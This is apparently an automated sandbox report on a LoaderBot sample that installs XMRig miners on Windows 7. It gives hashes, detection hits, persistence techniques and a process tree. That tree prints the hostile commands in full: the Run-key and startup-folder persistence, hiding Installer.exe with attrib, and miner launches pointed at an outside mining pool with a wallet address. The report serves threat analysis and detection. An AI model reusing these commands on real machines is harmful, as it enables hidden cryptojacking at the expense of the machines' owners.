loaderbot | 3095da09ee2fc9ec9a91ac1624fe670612450b5dd71fd8e1e59f11810c26654e

Analysis

max time kernel
150s
max time network
119s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
14-04-2024 01:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7fd525394f449871ea7be96a66ddc1ff6cb498aaaee85549cae392a782670780.exe
Size

4.2MB
MD5

b7250436469d05b646b54b00ccb74d7e
SHA1

7ad840124e69004c862d0cf3f722b00cbfbbb9d3
SHA256

7fd525394f449871ea7be96a66ddc1ff6cb498aaaee85549cae392a782670780
SHA512

599e2a873b14b461c628ef3fb3f9771e11d866ff16012e82fbd614267e4eab268abd0671ad6bca6bcc8a5808e94b5aa1dcbb7ba75c51e78a645f040d60732ba4
SSDEEP

98304:tt5Uqm7J/F8CAXFSubtgfzlM87bnHzNLhs5rugOyMhKGiDy7:ttw7JrAVRclM87bnTNTgOywUy7

Score

10^/10

loaderbot xmrig loader miner persistence

Malware Config

Signatures

LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
loader miner loaderbot
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

LoaderBot executable 3 IoCs

resource	yara_rule
behavioral1/files/0x0006000000014b4c-42.dat	loaderbot
behavioral1/memory/2492-45-0x0000000001360000-0x000000000175E000-memory.dmp	loaderbot
behavioral1/memory/2492-54-0x0000000006840000-0x00000000073B5000-memory.dmp	loaderbot

XMRig Miner payload 58 IoCs

miner

resource	yara_rule
behavioral1/memory/2580-57-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/572-63-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2584-69-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/3012-74-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2548-79-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/3020-85-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2420-90-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1492-95-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2404-102-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1704-109-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/3048-115-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2944-122-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2628-128-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1528-133-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1748-139-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1536-144-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2400-150-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1148-156-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2584-161-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/900-168-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1600-173-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1788-178-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2696-183-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2796-188-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1796-194-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2256-199-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1704-204-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2612-210-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1512-215-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/900-220-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1852-221-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/3020-226-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1580-232-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1580-231-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2876-238-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2944-244-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2092-250-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1704-256-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/3048-262-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2304-268-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1952-274-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1856-281-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/764-288-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1580-293-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1860-295-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1860-296-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1048-309-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2448-316-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1192-323-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1044-329-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1728-335-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1644-341-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1568-350-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1948-356-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2512-362-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2512-368-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2372-374-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2024-379-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	Installer.exe

Executes dropped EXE 64 IoCs

pid	Process
2688	7z.exe
2400	7z.exe
2672	7z.exe
2492	Installer.exe
2580	Driver.exe
572	Driver.exe
2584	Driver.exe
3012	Driver.exe
2548	Driver.exe
3020	Driver.exe
2420	Driver.exe
1492	Driver.exe
2404	Driver.exe
1704	Driver.exe
3048	Driver.exe
2944	Driver.exe
2628	Driver.exe
1528	Driver.exe
1748	Driver.exe
1536	Driver.exe
2400	Driver.exe
1148	Driver.exe
2584	Driver.exe
900	Driver.exe
1600	Driver.exe
1788	Driver.exe
2696	Driver.exe
2796	Driver.exe
1796	Driver.exe
2256	Driver.exe
1704	Driver.exe
2612	Driver.exe
1512	Driver.exe
1852	Driver.exe
3020	Driver.exe
1580	Driver.exe
2876	Driver.exe
2944	Driver.exe
2092	Driver.exe
1704	Driver.exe
3048	Driver.exe
2304	Driver.exe
1952	Driver.exe
1856	Driver.exe
764	Driver.exe
1860	Driver.exe
1500	Driver.exe
1048	Driver.exe
2448	Driver.exe
1192	Driver.exe
1044	Driver.exe
1728	Driver.exe
1644	Driver.exe
1572	Driver.exe
1568	Driver.exe
1948	Driver.exe
2512	Driver.exe
2512	Driver.exe
2372	Driver.exe
2024	Driver.exe
2484	Driver.exe
2116	Driver.exe
1452	Driver.exe
2376	Driver.exe

Loads dropped DLL 7 IoCs

pid	Process
2604	cmd.exe
2688	7z.exe
2604	cmd.exe
2400	7z.exe
2604	cmd.exe
2672	7z.exe
2492	Installer.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\Installer.exe"	Installer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2492	Installer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe
2492	Installer.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2492	Installer.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

description	pid	Process
Token: SeRestorePrivilege	2688	7z.exe
Token: 35	2688	7z.exe
Token: SeSecurityPrivilege	2688	7z.exe
Token: SeSecurityPrivilege	2688	7z.exe
Token: SeRestorePrivilege	2400	7z.exe
Token: 35	2400	7z.exe
Token: SeSecurityPrivilege	2400	7z.exe
Token: SeSecurityPrivilege	2400	7z.exe
Token: SeRestorePrivilege	2672	7z.exe
Token: 35	2672	7z.exe
Token: SeSecurityPrivilege	2672	7z.exe
Token: SeSecurityPrivilege	2672	7z.exe
Token: SeDebugPrivilege	2492	Installer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2100 wrote to memory of 2604	2100	7fd525394f449871ea7be96a66ddc1ff6cb498aaaee85549cae392a782670780.exe	28
PID 2100 wrote to memory of 2604	2100	7fd525394f449871ea7be96a66ddc1ff6cb498aaaee85549cae392a782670780.exe	28
PID 2100 wrote to memory of 2604	2100	7fd525394f449871ea7be96a66ddc1ff6cb498aaaee85549cae392a782670780.exe	28
PID 2100 wrote to memory of 2604	2100	7fd525394f449871ea7be96a66ddc1ff6cb498aaaee85549cae392a782670780.exe	28
PID 2604 wrote to memory of 2496	2604	cmd.exe	30
PID 2604 wrote to memory of 2496	2604	cmd.exe	30
PID 2604 wrote to memory of 2496	2604	cmd.exe	30
PID 2604 wrote to memory of 2688	2604	cmd.exe	31
PID 2604 wrote to memory of 2688	2604	cmd.exe	31
PID 2604 wrote to memory of 2688	2604	cmd.exe	31
PID 2604 wrote to memory of 2400	2604	cmd.exe	32
PID 2604 wrote to memory of 2400	2604	cmd.exe	32
PID 2604 wrote to memory of 2400	2604	cmd.exe	32
PID 2604 wrote to memory of 2672	2604	cmd.exe	33
PID 2604 wrote to memory of 2672	2604	cmd.exe	33
PID 2604 wrote to memory of 2672	2604	cmd.exe	33
PID 2604 wrote to memory of 2444	2604	cmd.exe	34
PID 2604 wrote to memory of 2444	2604	cmd.exe	34
PID 2604 wrote to memory of 2444	2604	cmd.exe	34
PID 2604 wrote to memory of 2492	2604	cmd.exe	35
PID 2604 wrote to memory of 2492	2604	cmd.exe	35
PID 2604 wrote to memory of 2492	2604	cmd.exe	35
PID 2604 wrote to memory of 2492	2604	cmd.exe	35
PID 2604 wrote to memory of 2492	2604	cmd.exe	35
PID 2604 wrote to memory of 2492	2604	cmd.exe	35
PID 2604 wrote to memory of 2492	2604	cmd.exe	35
PID 2492 wrote to memory of 2580	2492	Installer.exe	36
PID 2492 wrote to memory of 2580	2492	Installer.exe	36
PID 2492 wrote to memory of 2580	2492	Installer.exe	36
PID 2492 wrote to memory of 2580	2492	Installer.exe	36
PID 2492 wrote to memory of 572	2492	Installer.exe	39
PID 2492 wrote to memory of 572	2492	Installer.exe	39
PID 2492 wrote to memory of 572	2492	Installer.exe	39
PID 2492 wrote to memory of 572	2492	Installer.exe	39
PID 2492 wrote to memory of 2584	2492	Installer.exe	41
PID 2492 wrote to memory of 2584	2492	Installer.exe	41
PID 2492 wrote to memory of 2584	2492	Installer.exe	41
PID 2492 wrote to memory of 2584	2492	Installer.exe	41
PID 2492 wrote to memory of 3012	2492	Installer.exe	43
PID 2492 wrote to memory of 3012	2492	Installer.exe	43
PID 2492 wrote to memory of 3012	2492	Installer.exe	43
PID 2492 wrote to memory of 3012	2492	Installer.exe	43
PID 2492 wrote to memory of 2548	2492	Installer.exe	45
PID 2492 wrote to memory of 2548	2492	Installer.exe	45
PID 2492 wrote to memory of 2548	2492	Installer.exe	45
PID 2492 wrote to memory of 2548	2492	Installer.exe	45
PID 2492 wrote to memory of 3020	2492	Installer.exe	47
PID 2492 wrote to memory of 3020	2492	Installer.exe	47
PID 2492 wrote to memory of 3020	2492	Installer.exe	47
PID 2492 wrote to memory of 3020	2492	Installer.exe	47
PID 2492 wrote to memory of 2420	2492	Installer.exe	49
PID 2492 wrote to memory of 2420	2492	Installer.exe	49
PID 2492 wrote to memory of 2420	2492	Installer.exe	49
PID 2492 wrote to memory of 2420	2492	Installer.exe	49
PID 2492 wrote to memory of 1492	2492	Installer.exe	51
PID 2492 wrote to memory of 1492	2492	Installer.exe	51
PID 2492 wrote to memory of 1492	2492	Installer.exe	51
PID 2492 wrote to memory of 1492	2492	Installer.exe	51
PID 2492 wrote to memory of 2404	2492	Installer.exe	53
PID 2492 wrote to memory of 2404	2492	Installer.exe	53
PID 2492 wrote to memory of 2404	2492	Installer.exe	53
PID 2492 wrote to memory of 2404	2492	Installer.exe	53
PID 2492 wrote to memory of 1704	2492	Installer.exe	55
PID 2492 wrote to memory of 1704	2492	Installer.exe	55

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2444	attrib.exe

C:\Users\Admin\AppData\Local\Temp\7fd525394f449871ea7be96a66ddc1ff6cb498aaaee85549cae392a782670780.exe
"C:\Users\Admin\AppData\Local\Temp\7fd525394f449871ea7be96a66ddc1ff6cb498aaaee85549cae392a782670780.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2100
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2604
- - C:\Windows\system32\mode.com
    mode 65,10
    3⤵
    PID:2496
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e file.zip -p12151210907486279731870130990 -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:2688
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_2.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:2400
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_1.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:2672
- - C:\Windows\system32\attrib.exe
    attrib +H "Installer.exe"
    3⤵
    - Views/modifies file attributes
    PID:2444
- - C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
    "Installer.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2492
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2580
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:572
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2584
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:3012
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2548
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:3020
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2420
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1492
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2404
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1704
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:3048
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2944
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2628
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1528
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1748
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1536
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2400
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1148
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2584
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:900
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1600
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1788
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2696
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2796
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1796
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2256
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1704
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2612
